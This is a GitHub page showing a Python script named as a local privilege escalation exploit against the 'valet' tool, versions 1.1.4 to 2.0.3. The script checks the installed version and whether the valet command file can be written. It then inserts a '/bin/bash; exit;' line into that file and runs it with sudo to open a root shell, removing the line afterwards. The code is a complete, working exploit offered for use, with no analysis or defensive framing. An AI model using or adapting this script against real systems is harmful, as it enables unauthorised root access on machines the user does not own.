-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathLocal-Privilege-Escalation-Exploit.py
More file actions
99 lines (67 loc) · 2.78 KB
/
Copy pathLocal-Privilege-Escalation-Exploit.py
File metadata and controls
99 lines (67 loc) · 2.78 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
import os
import subprocess
MIN_VERSION = "1.1.4"
MAX_VERSION = "2.0.3"
POC = "/bin/bash; exit;\n"
def run_shit_get_output(shit_to_run):
return subprocess.Popen(shit_to_run, shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
def version_tuple(v):
return tuple(map(int, (v.split("."))))
def get_valet():
p = run_shit_get_output('which valet')
lines = ''.join(p.stdout.readlines())
if 'bin/valet' in lines:
return lines.strip()
return None
def get_valet_version(valet_location):
p = run_shit_get_output(valet_location)
v = p.stdout.read(25)
return v.split("\n")[0].split(" ")[2]
def can_write_to_valet(valet_location):
return os.access(valet_location, os.W_OK)
def cleanup_poc_from_command(command_location):
with open(command_location, 'r') as vc:
command_contents = vc.readlines()
if command_contents[1] == POC:
print('* Cleaning up POC from valet command')
command_contents.pop(1)
with open(command_location, 'w') as vc:
vc.write(''.join(command_contents))
return
print('* Could not cleanup the valet command. Check it out manually!')
return
def main():
valet_command = get_valet()
if not valet_command:
print(' * The valet command could not be found. Bailing!')
return
# get the content so we can check if we already pwnd it
with open(valet_command, 'r') as vc:
command_contents = vc.readlines()
# check that we havent already popped this thing
if command_contents[1] == POC:
print('* Looks like you already pwnd this. Dropping into shell anyways.')
os.system('sudo ' + valet_command)
cleanup_poc_from_command(valet_command)
return
current_version = get_valet_version(valet_command)
# ensure we have a valid, exploitable version
if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \
or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):
print(' * Valet version {0} does not have this bug!'.format(current_version))
return
# check that we can write
if not can_write_to_valet(valet_command):
print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))
return
# drop the poc line and write the new one
command_contents.insert(1, POC)
with open(valet_command, 'w') as vc:
vc.write(''.join(command_contents))
print('* Shell written. Dropping into root shell')
# drop in the root shell :D
os.system('sudo ' + valet_command)
cleanup_poc_from_command(valet_command)
if __name__ == '__main__':
main()